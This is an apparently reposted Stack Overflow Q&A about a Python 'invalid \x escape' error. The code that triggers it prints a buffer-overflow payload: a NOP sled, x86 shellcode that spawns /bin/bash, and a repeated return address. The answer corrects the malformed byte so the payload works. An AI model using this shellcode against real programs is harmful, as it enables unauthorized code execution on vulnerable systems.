gpt4 book ai didi

python - 值错误 : invalid\x escape

转载 作者:太空狗 更新时间:2023-10-29 17:24:55 56 4
gpt4 key购买 nike

python -c 'print "\x90" * 348 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x8\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x30\xd1\xff\xff" * 35'
ValueError: invalid \x escape

知道是什么导致了这个错误吗?

最佳答案

你在这个字符串中有\x8\,把它改成\x08

关于python - 值错误 : invalid\x escape,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/6956402/

56 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com